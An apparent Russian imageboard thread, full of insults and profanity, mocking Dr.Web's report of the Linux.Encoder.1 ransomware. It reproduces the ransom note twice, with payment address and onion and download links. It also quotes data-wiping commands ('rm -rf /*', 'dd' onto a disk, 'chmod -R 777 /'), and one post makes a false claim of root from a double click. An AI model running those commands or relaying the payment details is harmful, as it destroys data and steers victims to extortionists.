И что?
Оп - хуй на винде с ie.
>где ваша хвалёная пердобезопасность?
Без пруфов, ты лишь прокукарекал сейчас. Предоставь пруфы или уебывай.
>После запуска с правами администратора троян загружает файлы с требованиями злоумышленников
Хотя не надо уже пруфов. ОП хуй просто.
ОП-хуй, про права администратора не слышал, но решил выебнутся. Расходимся.
Пердольки, шифровальщику не нужны права админа.
Пруф-то доставь, маня
Чтобы сделать что-либо серьезное, нужны. Ты не только обосрался, но и еще автоматически обоссан за свою тупость.
Вашу домашнюю попочку он зашифрует и без рута, долбоебики.
>После запуска с правами администратора троянец
И снова ты обоссан.
После запуска с правами администратора троянец загружает файлы с требованиями вирусописателей и файл, содержащий путь до публичного RSA-ключа, после чего запускает себя как демон и удаляет исходные файлы.
Тебя мало обоссали, утенок?
Если ты сам запустил, ССЗБ.
Его надо запустить сначала. А запускать левые бинарники будет только спермоклоун и иногда колясочник.
КОКОЙ КОШМАР!!!1111
У меня от этой хуйни ОДНОСТРОЧНИК НА ПЕРЛЕ. Сам запустил -- ССЗБ.
> Клоуны очередной раз обосрались, пытаясь захейтерить линукс.
Олсо, у меня складывается впечатление, что вся эта параша рождается в недрах АНТИВИРУСНЫХ ЛАБОРАТОРИЙ. Видать, чует вендекапец "дохтур еб", прощупывает рынок.
У меня от этого НАКАТИТЬ КАСПЕРСКОГО НА ДЕБИАН.
Ого, как быстро пердосектанты в отрицание ушли. Будет запущен без прав администратора - зашифрует всё, до чего дотянется.
> производится шифрование файлов, доступных в рамках текущих привилегий доступа
Ты это только понял? Уже давно понятно что эти ваши шиндавиросы антивирусные компашки и делают
И где тут отсос? Ни одна ОС не защищена от долбоебизма пользователя.
"Лабораторией Рассейский Параноик выявлено вредоносное ПэО, шифрующие файлы на диске.
Оно представляет собой скрипт, инсталлирующий и запускающий GnuPG.
README к данной программе представляет собой одну строку строгой инструкции, избежать выполнения которой никому не удалось:
"Root, запусти меня! Я недомая хрень для админов локалхостов и что-то для тебя сделаю!"
(c) opennet
Я не перестаю в голос проигрывать с треда
Расскажи как он на моем арче окажется. Мне надо самому его запустить, собрать, дать права админа и смотреть как ахуевший сервис моё файло трогает?
>привилегий доступа
Что ты знаешь про права chmod?
Ты обоссан еще раз
Пользуясь случаем, еще раз напомню уважаемым джентельменам о необходимости делать бэкапы.
Не криптор, так аппаратный отказ винта, ось не важна особо.
Не криптор, так аппаратный отказ винта, ось не важна особо.
Это вариант для слабых. Наиболее сильные особи держат все проекты на единственной флешке, ну и подключают ее куда попало.
> в рамках текущих привилегий доступа
> зашифрует всё
root нулевого дня прямо.
Оп, дай линк, я попробую накатить ВИРУС.
Ну меня-то на BolgenOS'е хуй взломают
кек, клованский высер докторвебцев. Они давно с своим докторвебподелием хотят повесить лапшу на малолетних убунтят, типа без антивируса никак, срочно ставь.
Возможно, правдой и неправдой так и заставят убунтодебилов антивирус покупать.
Возможно, правдой и неправдой так и заставят убунтодебилов антивирус покупать.
Двачую за линк. У меня как раз в виртуалке лежит дебиан. Вот на нём и проверю.
http://vms.drweb.ru/virus/?i=7703983
> После запуска с правами администратора троянец загружает в память своего процесса файлы с требованиями вирусописателей:
> После запуска с правами администратора троянец загружает в память своего процесса файлы с требованиями вирусописателей:
Требую линк на ВИРУС, что качать то?
Нет там линка
> Рекомендации по лечению
На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.
http://products.drweb.ru/linux/?lng=ru
Лол, втюхивание товара.
Да ОП-хуя уже обоссали
Алсо, ОП-даун, а что про свою шинду-то умолчал?
По SHA1 никак не найти?
По ссылке все хеши ведут на сайт др. Веб
Выводы делайте сами.
И да ОП хуй обосрался.
А как ты его найдёшь?
его уже лет пять как "втюхивают" - ставил триал версию года четыре назад, имитацию работы создает, а теперь вот какбы и "настоящий вирус" для него придумали, лол
Оп, ты чего замолчал. Осознал в каких масштабах обосрался?
Имя файла бы
это же Пердоля с его петросянством, он прекрасно знает что несет
Смяшные кортинки типо кончились
Ну чего ценного у пердолика хранится в home? Ладно там у людей фотографии, документы. У пердолика там в лучшем случае портрет штульмана на рабочий стол.
> портрет штульмана на рабочий стол.
Анимедевочка же.
Погуглил Linux.Encoder.1 download не чего не нашел, да я аутист.
> 2015
> рабочий стол
>2015
>Arch
Удваиваю. ~/ рулит!
Арчик не детектися макабой, у него либо манджари либо кастомный юа.
Именно!
> Интересно, что за 2-3 дня об этой вирусне знает только дрвеб.
> Кто написал, тот и знает.
(c) opennet
> Кто написал, тот и знает.
(c) opennet
> Очередной молдавский вирус.
Как же бомбит клоунам от безопасности linux.
Лол, да он же без рута даже запустится.
Может его еще и скомпилировать самому надо, и зависисмости все подтянуть с реп?
Может его еще и скомпилировать самому надо, и зависисмости все подтянуть с реп?
> да он же без рута даже запустится.
хотел сказать не запустится?
запустится без рута, но пошифрует только пользовательскую папку.
Проклятый LINUX!!! Даже вирусы на нем не могут нормально работать
Нет, не только что, лол.
> пошифрует только пользовательскую папку.
Этого же хватит, на систему похуй обычно.
> а что про свою шинду-то умолчал?
Так ШИФРОВАЛЬЩИКОМ под венду никого не удивишь. Венда это вообще такое помойное ведро с червями и вирусами, каг говорил ленечка наш каганов.
> "После запуска с правами администратора троянец загружает файлы..."
Создам пользователя "Администратор", буду под ним работать. И пафосно, и безопасно.
Создам пользователя "Администратор", буду под ним работать. И пафосно, и безопасно.
>но пошифрует только пользовательскую папку.
И то если дауны права чтение/записи/выполнение нормальные не поставят
Закэшированный гуглом текст файла (в новость он целиком не попал)
Your personal files are encrypted! Encryption was produced using a unique public key RSA-2048 generated for this computer.
To decrypt files you need to obtain the private key.
The single copy of the private key, which will allow to decrypt the files, located on a secret server at the Internet. After that, nobody and never will be able to restore files...
To obtain the private key and php script for this computer, which will automatically decrypt files, you need to pay 1 bitcoin(s) (~240 USD).
Without this key, you will never be able to get your original files back.
______________________________________________
!!!!!!!!!!!!!!!!!!!!! PURSE FOR PAYMENT(ALSO AUTHORIZATION CODE): 1zKaz9PpVDuH7CpAeV7FmQyUy25Wq9SeC !!!!!!!!!!!!!!!!!!!!!
WEBSITE: https://z54n57pg2el6uze2.onion.to
INSTRUCTION FOR DECRYPT:
After you made payment, you should go to website https://z54n57pg2el6uze2.onion.to
Use purse for payment as ur authorization code (1zKaz9PpVDuH7CpAeV7FmQyUy25Wq9SeC).
If you already did the payment, you will see decryption pack available for download,
inside decryption pack - key and script for decryption, so all what you need just upload and run that script ( for example: http://http://culinae.no/decrypt.php )
Also, at this website you can communicate with our supports and we can help you if you have any troubles,
but hope you understand we will not answer at any messages if you not able to pay.
!!!P.S. Our system is fully automatic, after payment you will receive you're decrypt pack IMMEDIATELY!!!
How to buy bitcoin(s): https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version)
(рабочий логин -- например такой -- "1EuH9uz6UZoqupWQZv1UKBLkHJfXXLR7UF" )
скриншот ихнего сайта техпожжержки -- http://i3.minus.com/iHdkocqkTmm5z.png
PHP-скрипт для расшифровки -- https://www.dropbox.com/s/vnhaquaxksxmxwo/decrypt.zip (содержит также и файл "key.pem" )
Your personal files are encrypted! Encryption was produced using a unique public key RSA-2048 generated for this computer.
To decrypt files you need to obtain the private key.
The single copy of the private key, which will allow to decrypt the files, located on a secret server at the Internet. After that, nobody and never will be able to restore files...
To obtain the private key and php script for this computer, which will automatically decrypt files, you need to pay 1 bitcoin(s) (~240 USD).
Without this key, you will never be able to get your original files back.
______________________________________________
!!!!!!!!!!!!!!!!!!!!! PURSE FOR PAYMENT(ALSO AUTHORIZATION CODE): 1zKaz9PpVDuH7CpAeV7FmQyUy25Wq9SeC !!!!!!!!!!!!!!!!!!!!!
WEBSITE: https://z54n57pg2el6uze2.onion.to
INSTRUCTION FOR DECRYPT:
After you made payment, you should go to website https://z54n57pg2el6uze2.onion.to
Use purse for payment as ur authorization code (1zKaz9PpVDuH7CpAeV7FmQyUy25Wq9SeC).
If you already did the payment, you will see decryption pack available for download,
inside decryption pack - key and script for decryption, so all what you need just upload and run that script ( for example: http://http://culinae.no/decrypt.php )
Also, at this website you can communicate with our supports and we can help you if you have any troubles,
but hope you understand we will not answer at any messages if you not able to pay.
!!!P.S. Our system is fully automatic, after payment you will receive you're decrypt pack IMMEDIATELY!!!
How to buy bitcoin(s): https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version)
(рабочий логин -- например такой -- "1EuH9uz6UZoqupWQZv1UKBLkHJfXXLR7UF" )
скриншот ихнего сайта техпожжержки -- http://i3.minus.com/iHdkocqkTmm5z.png
PHP-скрипт для расшифровки -- https://www.dropbox.com/s/vnhaquaxksxmxwo/decrypt.zip (содержит также и файл "key.pem" )
Я придумал пердовирус, суть токова. Это плашка СКОЧАТЬ НОВУЮ СЕРИЮ БИТАВ ПРИСТОЛАВ на вебсайтах с скриптом, который изменяет конфиг ксорга в хомяке, чтобы черный экран при следующей загрузке убунты. Никаких рутов нинада, достаточно поломать настройку.
>https://www.dropbox.com/s/vnhaquaxksxmxwo/decrypt.zip
А ведь найдется долбоеб ITT, который скачает и что-нибудь оттуда запустит на рабочей системе.
У кого тут виртуалочка под рукой была?
Не проще ли уж тогда rm -rf /* шоб надёжно
У меня
>А ведь найдется долбоеб ITT
Действуй
> изменяет конфиг ксорга
> Никаких рутов нинада
Как так то? Уж лучше создать скрытый файл настроек в домашнем каталоге, который перекроет корневой.
> 20 строчек на PHP, а остальное это base64-закодированный-исполняемый файл.
Не запускал.
> 2015
> x11
> не юзать wayland
Проигрываю с треда. Пользователи Шиндовс реагирует на новые вирусы равнодушно, так как уже привыкли к ним. А здесь не то что боятся, а даже хотят накатить, проверить и небось отладить его еще.
нукась подскажи универсальное решение, которое будет сбивать загрузку графической системы
Wayland еще сырой до ужаса. а и преимуществ по сравнению с иксами не так и много. Плюс свои недостатки имеет. Планировали революцию, а по сути сделали обычную альтернативу. Если оно и взлетит, то только с помощью форса красношляпых.
> ~/.bashrc
startxhui
Первое говно какое пришло в голову.
Ему сначала надо дать право на выполнение через chmod. Так что по крайней мере в моей системе без рута не запустится.
Двачую этого пидора
Как запустить этот скрипт из соснольки? Пишу php *.php Пишет что команда не найдена
Анон с вируалкой
Анон с вируалкой
readme.txt
Да нахуй этот вирус. Я даже его запустить не могу.
Ну, допустим у меня пяток контейнеров, лол.
apt-get install php.
Kek
Запиши на видео то, как ты запускаешь данный ширус и выложи нам.
Проиграл. Вся суть линукс-виросов
1 BTC = 24124 RUR
Ага. Даже ширусы не запускаеются на нем. Ну и нахуй он нужен тогда? Такой-то ноусофт.
Сижу и представляю лицо ОПа.
> Но ведь вирус
> Др. Веб сказал.
> Но ведь вирус
> Др. Веб сказал.
Все запускается, просто надо попердолиться как всегда
Не слишком ли жестоко, так разрушать его манямирок?
Во-во. Не то что на Шиндовсе. Там все сразу запускается. Никакого пердолинга.
НАСТАЛО ВРЕМЯ Вирус сам себя не починит. Система сама себя не сломает.
Какой шалунишка уже схоронил?
http://arhivach.org/thread/120588/
http://arhivach.org/thread/120588/
Пришло время устанавливать антивирус
Ну ты и наркоман
А ВДРУГ ЭТА ХУИТА МНЕ /home ЗАШИФРУЕТ?!
правда уже и так все зашифровано
Да у тебя и собака уже зашифрована
> Повышение привилегий.
Да это же сам вирус.
МНОГОХОДОВОЧКА Д. ВЭБА СПЕШИТЕ ВИДЕТЬ
Да кот бы сомневался, сотона.
Кот у нас всегда в себе уверенный.
Котэ да, он у нас молодца.
Чому пердосектанты так полыхнули в этом итт тхреде?
Наоборот тут все веселятся.
Двачую, вон анон даже на себе решил вирос опробовать
Проиграл
В общем, сейчас буду запускать вирос, посаны. Видео песаьт лениво, наделаю скриншотов.
С богам
Ждемс
А что так лениво? ffmpeg не может в захват экрана? Удачи в любом случае
Да я неспешно напердоливаю. С перерывами на чайок и общением в жабке.
у тебя проблемы со зрением?
Нет, а что?
шрифты большие
Читал тред по диагонали. Ну так что, нам там пиздец, или ОП все-таки соснул?
БЕРЕГУ ЗРЕНИЕ. На самом деле, расстояние до экрана метра полтора.
И так, для начала, ебал я вантузом в сраку вонючий дропбокс.
пиздец соснул
А, нет, нормально. Но все равно, говно этот ваш дропбокс. Внутри заюючная gpg-шифровка.
Так долго это все. Появилось желание самому накатить виртуалочку и проверить.
А почему сперма какает из твоего рта тогда, школьничек?
Запустили. Параша просралась на отсутствие at. Сдохла.
Доустанавливаем, запускаем. Отработало. Это вот список процессов. Ну хуууй знает.
В общем, виросы в луниксе распространяются по следующему принципу: УХ ТЫ! ВИРУС! ДАЙ ПОСМОТРЮ, ГДЕ СКОЧАТЬ?!!!1111
Доустанавливаем, запускаем. Отработало. Это вот список процессов. Ну хуууй знает.
В общем, виросы в луниксе распространяются по следующему принципу: УХ ТЫ! ВИРУС! ДАЙ ПОСМОТРЮ, ГДЕ СКОЧАТЬ?!!!1111
не понимаю о чем ты пердоля
О, господи. И тут пехапе.
это же decrypt то есть дешифровщик. Там выше была ссылка на виртотал, но бинаря ведь нету
Пердоля, утрись и зубы почисти. От тебя смердит.
Почистил тебе за щеку. Продолжай.
Шел бы ты отсюда.
В общем, CT я не удолаю, пущай повисит, может сделает что-нибудь смешное. Несите там еще поцыэнтов.
В кронтаб вроде ничегой не пропейсалось, усероф не наплодило, заданий ата тоже не насоздавало.
Та мало ли. Я и в decrypt что-нибудь веселое воткнул.
В кронтаб вроде ничегой не пропейсалось, усероф не наплодило, заданий ата тоже не насоздавало.
Та мало ли. Я и в decrypt что-нибудь веселое воткнул.
У DR.WEB акция сейчас или новую продукцию для линукса запускают?
КУПИ АНТИВИРОС И ПОЛУЧИ КОЛЛЕКЦИЮ ВИРОСОВ БИСПЛАТНО
Двачую этого.
Уже запустили
ща накатаю чистую виртуалку попробую запустить под рутами.
Ну дай мне вирус, я тоже хочу. А то декриптор безобидный, походу.
> кастомный юа.
This.
На-манжаре
Искать нужно.
Чего то мне сразу стало лениво лол.
Хуйли искать все хеши ведут на сайт др. веба.
Ляль. Пердосектанты забугуртили яростно виляя срачками и шля смски васянам для дешифровки своих пердофайлов.
О, еще один толстяк.
На так что? Фейл?
Фейк
пофиксил тебя
Короче ОП официально отсосал.
Так что есть ссылка на этот срташный "вирус"? тоже потестить хочу.
Никто найти не может.
>После запуска Linux.Encoder на сервере
Лол.
Мог бы тогда сразу нести dd if=/dev/zero of=/dev/sda
В общем, еще оно высрало вот такую штуковину. Запускаем... И... СЕГФОЛТ
А почему ты тогда смску васяну отправил?
ПООБЩАТЬСЯ ХОТЕЛ
Ты норкоман штолеа? Ебом токнуть?
ALLO
@
PELDOLYA, ETO TY?
NIET, EGO NIET!
@
CHO PEREDAT'?
RANO ECHE
Я блядь одного не понимаю, почему эти треды не тонят то? Почему тут столько постов?
Разумеется от юзера дегенерата ничего не спасёт, это нормально, всё, тема закрыта, но нет блядь, тред весит в топе, заебись.
збс тред ж
Да вообще 10/10.
Заебали смермодауны, которые плескаются в своём говне из дырок, вирусов, etc, и при этом изо всех сил пытаются найти хоть какой-то фейл в unix'aх, выставляя это как СРЫФ ПАКРОВ, прямо мир выебали, хотя это даже приблизительно не может сравнится с их кривым говном. И мало того, что это само по себе смотрится крайне уныло, так и "проблемы", которые они затрагивают - результат тупости пользователя, а не недоработка системы. И всё это я вижу сразу при заходе в /s/, и это уже даже не смешно, даже не грустно, это убого, заебали.
Ждем ебилдов.
Пердоля, да в твоём жму/аналиксе и искать-то ничего не надо. Он сам по себе уже фейл.
Ъ
Первая порватка пошла.
Я вижу.
Так отойди от зеркала.
Прости, я не хотел обидеть. Если тебе нравится виндовс - пользуйся, я ничего не имею против, хорошая наверно ос, не гори пожалуйста, мне стыдно, честно. Добра.
Ладно.
Я вообще-то у окна стою на тебя смотрю.
>А запускать левые бинарники будет только спермоклоун и иногда колясочник.
Ну почему.Еще тупая прыщеблядь, которая верует: "У меня жи линюкс, это бизапасна!".
>Расскажи как он на моем арче окажется. Мне надо самому его запустить, собрать, дать права админа и смотреть как ахуевший сервис моё файло трогает?
Нет, все гораздо проще. У тебя запускается exe-файл (или какое там расширение у исполняемых файлов, у вас, прыщеблядей?), ну и.... И собственно и все.
Заскринил для истории.
>У тебя запускается
Ну что за долбоёб
Тред не о чем, запускать левые бинарники только спермачи умеют, в луниксе так не принято.
На самом деле всё зависит от пользователя. Я знаю одного пердолю, который любит всякую хуиту запускать, а потом заново накатывать свою бубунточку.
Надо твоего пердолю с этим познакомить
Подерутся.
А смысл твоему пердоле на прыщах тогда сидеть? Модно-илитно потому что?
> У тебя запускается
> запускается
Вот это да.
Я конечно знал, я то спермачи тупые, но этот клинический случай.
Нахуй ты в отражение окна смотришь, даун
?
>пердоле
>не сидеть на прыщах
Ловите наркомана!
Где же ему ещё тогда сидеть?
Лол. Пердоля проснулся и тут же трижды сдетонировал. Найс.
Сука, как же я проиграл.
На Виндоусе, не, ну а че, Линуксом он все-ровно пользоваться не может, зачем он себе мозги ебет этим?
> Я не обосрался.
Найс.
Сиди сам на хуе с винлоками.
Сема, плз.
> У тебя запускается exe-файл (или какое там расширение у исполняемых файлов
Мы тут эту порноту всем тредом пытались запустить НИВЗЛЕТЕЛО. Похоже, вирос работает только на ИСПЫТАТЕЛЬНОМ СТЕНДЕ лаборатории дохтура еба.
Пердольке больно видеть обосрамс своей питухоси, пердолька хочет потопись тред. Найс.
Так покажи этот обосрамс, толстый?
Ты не тот аутист с хубунтой из вчерашнего треда?
Двачую, интересно, может им написать что хотим потестить вирос в целях безопасности, может дадут, если нет - то официально объявить их пиздаболами всея двочей
Напиши, мне тоже интересно глянуть. С меня виртуалки виртуалочки.
Не, ну а смысл лезть человеку туда, где он не черта не понимает?
Я щас не дома и без бука. Завтра только буду
Я разработчик Доктор Веба, все что написанно в ОП посте правда. Троян через LPE получает рута от двойного клика в любой известной версии Gnome.
>Я разработчик Доктор Веба
>все что написанно в ОП посте правда
>получает рута от двойного клика в любой известной версии Gnome
>шифрующего файлы на серверах
Вот так обосрамс.
И каким же образом, зеленый?
Даже на их недосайте написано что вирос активируется только под правами одмина. Не толсти, маня.
Ох пердоли, он же просто безобидно пошутил, что вы так-то?
> Я разработчик Доктор Веба,
А я томат.
Спемпач уже от зондов толстоту от шутки отличить не может
- толстота
- безобидная шутка
Ну, как-то так. Подождем.
> для тестирования
Надо было писать в целях личной безопасности своих серверов.
Так за хакцера тебя могут посчитать.
>Так за хакцера тебя могут посчитать
А смысл хацкеру в чужом скопиляном говновирусе? Я ж не исходники прошу, лол.
Ну хуй знает, я же аутист
> я же аутист
значение знаешь?
Хуй знает, я же аутист.
Блядь, да я под виндами заебался вирус запускать, под линуксом запустить вирь у меня терпения не хватит.
Ну в общем-то разницы нет - "виросы" под винду давно уже тоже надо самостоятельно запускать, да ещё и соглашаться дать им права админа в окне УАКа. Не то, чтобы было невозможно написать классический вирус, эксплуатитующий дыры в системе, но это ненужно - гораздо проще и быстрее использовать социальную инженерию, полагаясь на тупость пользователей. И бОльшая "завирусованность" винды объясняется не тем, что она хуже качеством, а лишь тем, что на ней на два порядка больше пользователей, а также тем, что пользоваться пердоликсом и по сей день можно лишь обладая неслабой компьютерной грамотностью, каковая является самым серьёзным барьером на пути любого вироса.
> что она хуже качеством
Этим в том числе. И принципами, корни которых уходят в седую древность: НЕ РАБОТАЕТ, ЗАПУСТИ ИЗ-ПОД АДМИНА, ПЕРЕЗАГРУЗИСЬ, ПЕРЕУСТАНОВИ. В итоге, сейчас вообще доходит до маразма с постоянно висящими в бэкраунде антивиросами и UAC, пердящим на каждый чих.
В Винде нет репозиториев - это отдельная большая дырка. Лично знаю людей, которые чтобы найти нужную прогу - просто пишут в ее Гугле и где-то хуй пойми где ее находят. Даже для бесплатного софта, который можно легально получить на официальном сайте.
> ЗАПУСТИ ИЗ-ПОД АДМИНА
> UAC, пердящим на каждый чих.
Ну да, то-то в пердоликсе что не команда в терминале, то sudo, установка программ через гуй -пожалуйте, вводите пароль (СВОЙ, не рута!), потом еще пароль и ещё.
А еще ты забыл написать, что даже восьмерочка, создает самого первого пользователся прри установке с админ правами. МС сам приучает пользователей сидеть под админом.
Если человек сам, уже после инсталла, не решит создать отдельного админа, а своему юзеру понизить привилегии, то так и будет серфить инэт с правами админа, пиздец просто. МС сферические уебки в вакууме.
> создает самого первого пользователся прри установке с админ правами
Какой же он нахуй админ, если UAC во все поля? От админа только название.
Нет там таких команд, для которых нужен sudo чтоб они просто работали, но если команда трогает какой-то системный файл, то логично, что ей рут нужен.
Если команды касаются администрирования, то нет ничего удивительного, что потребуются права суперпользователя. Для обычной повседневной работы такие права не нужны ни в гуе ни в консоли.
Не надо смешивать мух и котлет. В юниксоподобных повышение привиллегий требуется строго определенным классом приложений, которым нужен прямой доступ к блочным устройствам, интерфейсам либо общесистемным файлам. При этом, практически любое приложение, которому все это не требуется, может быть установлена в домашний каталог пользователя.
А в винде, а в винде... Давно прошла та эпоха, когда для рабоспособности игрульки, запускать ее требовалось под админом?
На самом деле, причина проста: unix и подобные -- это изначально многопользовательская операционная система. Windows -- однопользовательская.
Ты знаешь, мне эта ситуация с UAC'ом напоминает дурдом: эдак на тебя надевают смирительную рубашку ДЛЯ ТВОЕГО ЖЕ БЛАГА, чтобы не поранился в припадке.
> Давно прошла та эпоха, когда для рабоспособности игрульки, запускать ее требовалось под админом?
Вот именно, что прошла.
Так и есть.
>требуя для своего размещения эксплуатации неисправленных уязвимостей в серверном ПО или в web-приложениях.
Тред закрыт. ОП спермоблядь обосралась как всегда.
Тред закрыт. ОП спермоблядь обосралась как всегда.
Спрашивается, каким долбоебом надо быть, чтобы скачать, проверить по MD5, скомпилировать, установить и запустить подобную херню.
Сам юзаю GNU/Linux в виртуалке для обучения программированию, никогда не сталкивался с подобным malware и ransomware.
Впрочем, подобный вредоносниый скам рассчитан на тупых долбоебов, не умеющих в
а) основы компьютерной грамотности;
б) создание резервных копий
независимо от операционной системы.
> GNU/Linux
> для обучения программированию
Че тебе не нравится, долбоёбина?
а под слакой пойдет или патчить придется?
Мне вот интересно, а как можно не самому запустить исполняемый файл в какой-либо ОС? Система сама их должна детектить, выставлять повышенные права и выполнять?
очевидно что ты тупишь или весь такой из себя набэкапленый
сабж конечно больше похож на чейто прикол
порцию позитива с треда я получил, особенно с кадра который 64 битный статик на 32 битной виртуалке запускал
и прочих коментов, хотя и по диагонали, годный тред
Столлман залогинься
чуваки, а просто баш скрипт вас устроит
ебилда
хацкеру ничего не надо, он хочет ломать, полностью
ладно всем чмфки в этом треде
> Вот именно, что прошла.
А привычки остались.
> , особенно с кадра который 64 битный статик на 32 битной виртуалке запускал
О каг. То есть, мне для запуска ВИРОСА нужно было еще и тридцатидвухбитную систему накатить? Кокая прелесть.
>2015
>не мочь запустить вирос в ленуксе
Сперманя сьеби нахуй и не позорься.
Какие же вы дебилы.
С 1 января 2016 года в госучреждениях и муниципалке РФ будут выпиливать весь иностранный софт, если он имеет отечественные аналоги. Короче - венду из государства выпилят нахуй. Всё. И сразу перестанет закупаться как винда, так и примочки на неё - в том числе те же антивирусы! - а в каждой школе на компах прыщи встанут.
Антивири теряют некислый такой рынок сбыта, и для того, чтобы сохранить бабла, надо что-то предпринять. Вот и вытаскиваются старющие попытки написать вирус под прыщи созданные чисто для того, чтобы показать, что в теории это как бы было бы возможно, если бы не X, Y и Y1, выкладываются как доказательство небезопасности системы и пиздец. Это просто попытка напилить денег в изменившихся условиях, только и всего. Мало ли, может и наебут кого, если не всех.
При этом, что характерно, никто из кудахчащих спермачей выше так и не скинул сам файл вируса. Я бы ради такого с радостью достал бы виртуалку и запустил бы под ней его, записав на видео и выложив пруфы тут. Но нет, будем кудахтать. Идиоты-веруны такие идиоты.
С 1 января 2016 года в госучреждениях и муниципалке РФ будут выпиливать весь иностранный софт, если он имеет отечественные аналоги. Короче - венду из государства выпилят нахуй. Всё. И сразу перестанет закупаться как винда, так и примочки на неё - в том числе те же антивирусы! - а в каждой школе на компах прыщи встанут.
Антивири теряют некислый такой рынок сбыта, и для того, чтобы сохранить бабла, надо что-то предпринять. Вот и вытаскиваются старющие попытки написать вирус под прыщи созданные чисто для того, чтобы показать, что в теории это как бы было бы возможно, если бы не X, Y и Y1, выкладываются как доказательство небезопасности системы и пиздец. Это просто попытка напилить денег в изменившихся условиях, только и всего. Мало ли, может и наебут кого, если не всех.
При этом, что характерно, никто из кудахчащих спермачей выше так и не скинул сам файл вируса. Я бы ради такого с радостью достал бы виртуалку и запустил бы под ней его, записав на видео и выложив пруфы тут. Но нет, будем кудахтать. Идиоты-веруны такие идиоты.
> С 1 января 2016 года
Сказочка-неотвязочка, эту хуйню уже лет десять обещают, а до сих пор нихуя.
>в каждой школе на компах прыщи встанут
Ага, щас.
А вот и список тупых пердоблядей: https://t.co/9TMmCJqE6t
Большинство из этих сайтов, однако, исправно работают.
>250 хостов
Да у нас тут целая ЭПИДЕМИЯ. Не устаю проигрывать со спермачей.
Потому что заражались не из под рута
> ВРЁТИ БИЗРУТА НИРАБОТАИТ PROOOFS
Пердосектанты, как всегда, жидко обосрались
Ты совсем ёбнутый? Сайты то исправно работают, всё что сделал этот ужасный "вирус"-это высрал txt файл
Ебать дебил. Если вирус создал файл в папке /wp-includes/js/, значит у него были права на запись.
>кудах
Спермопитух с камерой во рту и кейлоггером в анусе что-то невнятно прокукарекал.
Ну вот баран-вебмастер, значит, если полные права на запись на всю веб-папку ставил. ССЗБ.
Пердовафлер копротивляется за швободную дружбу с троянами в пердак, бггг.
Зачем ты копротивляешься, пердовафлер?
GNU/Linux-бог
А кто по твоему их назначил?
Слишком толсто, сажи
#chmod -R 777 /
>GNU/Linux-питух
И его искроментный реверс, поапплодируем.
Питух, зачем ты реверсишь?
Зачем ты сам с собой разговариваешь?
Питух, ты опять сам с собой разговариваешь?
Зачем ты сам с собой разговариваешь?
Зачем ты сам себе вопросы задаешь?
Спермопетух опять обосрался с аргументацией и перешёл на картиночки. Впрочем, ничего нового.
Зачем ты сам с собой разговариваешь?
Спермопетух, зачем ты обосрался?
Как стать ОПом успешного, популярного треда? Очень просто, напейши про вирусы для линукса, красноглазики сами набегут и радостно догонят тред до бамплимита. Чур, я следующий тред создаю.
>обоссан за тупость
>визжит на весь тред
>я вас затраливалел)
На любую ОС , на на которую можно установить ПО, - могут быть вирусы . Это истина, от которой нужно отталкиваться в рассуждениях. Linux - не исключение. Разница между OS Windows и Linux в том, что Linux-система менее развитая система, и может быть огромный решетом, в сравнении с OS Windows. Я имею ввиду дыры, которые не требуют установки вируса в систему. Поправьте, если я не прав, хочется быть грамотным в этом вопросе.
Ты ошибся, я GNU/Linux-бог.
>Linux-система менее развитая система
>Поправьте, если я не прав
Поправил.
Хороший вброс.
На самом деле у пиндовс неплохая защита, но клоуны сидят под учеткой админа, ставят мокрые писечки, скачанные хуй знает откуда и чистят майнеры и вирусы целыми днями.
Шифровальщик залили через очередную дыру в веб-сервере, у него есть доступ ко всему, к чему у веб-сервера.
> через очередную дыру
Даун перечитай новость и ветку.
>Linux-система менее система развитая система
>Поправьте, если я система не прав
>Поправил система.
Запостил один высер
@
Десяток красноглазых маняторят тред, с пеной у рта строча сотни постов и накатывая виртуалки, как будто их выебут в жопу, если они не опровергнут каждый очевидный высер
@
Мы абассали ОПа, ниприкидывайся траллем!
А, ну ладно, я просто хотел сказать, не важно, прав ОП, или не прав, но раз вы ведетесь, ты он уже подебил вас. У здоровых людей тред состоял бы из двух постов - ОПовского и "не запускаю неизвестное говно под рутом /тхред".
С надеждой на вашу адекватность, покедова.
/тхред
>требуя для своего размещения эксплуатации неисправленных уязвимостей в серверном ПО или в web-приложениях
>залили через очередную дыру в веб-сервере
Всё правильно написал.
>сервер на линуксе априори ниуизвим дыр нет
Ясно.
> он подебил
Вот тут ты прав.
Ты где прочел про неуязвимость, даун.
Лол, ты только что сделал прыщи УЯЗВИМОЙ ДЛЯ ВИРУСОВ СРЕДОЙ.
Еще один перечитай новость http://www.3dnews.ru/923200
Зачем мне в очередной раз читать фантизии журнашлюх? Очевидно, что файлы в хомяке можно шифровать и без рута.
Меня умиляет твое отрицание.
> Зачем мне в очередной раз читать
Что бы не нести хуйню, вроде этой
Че ты несешь, даун.
А чего это мочепетух защищает спермомразь?
Его тоже потерли.
Читать журнашлюх, чтобы не нести хуйню? Ты что-то путаешь, в реальном мире всё наоборот: тупачок читает новость, автоматически принимает её содержимое за истину и бежит кудахтать. Примерно как ты.
Я умываю руки, ты подебил.
В линуксе дыр не меньше чем в винде, просто это никто не исследует, так как выгоды в этом никакой нет. Современные вирусы рассчитаны на заработок злоумышленника, а особой выгоды от спизженных учеток веб-сервера нет.
> GNU/Linux
Чо, прям на гну/линукс сидишь? Как там, в начале 90-х? И ваще, LFS илитней. Не собрал - не мужик!
>все сервера на прыщах
>выгоды в этом никакой нет
Вот это манямирок!
ты обосрался
Манямирок только у тебя в голове, чухан, насмотрелся фильмов и думаешь, что злоумышленникам нужны серверы для всякой хуйни. Даже для сраного ддоса эффективнее использоваться пару тысяч узлов с рандомным каналом, нежели сотню с гигабитом.
>злоумышленникам нужны серверы для всякой хуйни
Точно, на самом деле номера кредиток и персональные данные никому не нужны, не говоря уже о каких-то ссаных процессингах. Кому они нужны, когда можно получать копейки с домашних ПК?
>номера кредиток
Ой бляяяяя, вы посмотрите на него. И что ты с этими номерами кредиток сделаешь, уеба? Ты знаешь цены на дампы? 10 долларов за 1000 номеров.
Да еще и целые процессинги светящиеся во внешний мир, не иначе как через веб-серверы лол. Иди ка ты на хуй, кукаретик прыщеглазый.
Не иначе как процессинги в твоем манямире работают под управлением postgress? Или, прости господи, mysql?
>10 долларов за 1000 номеров.
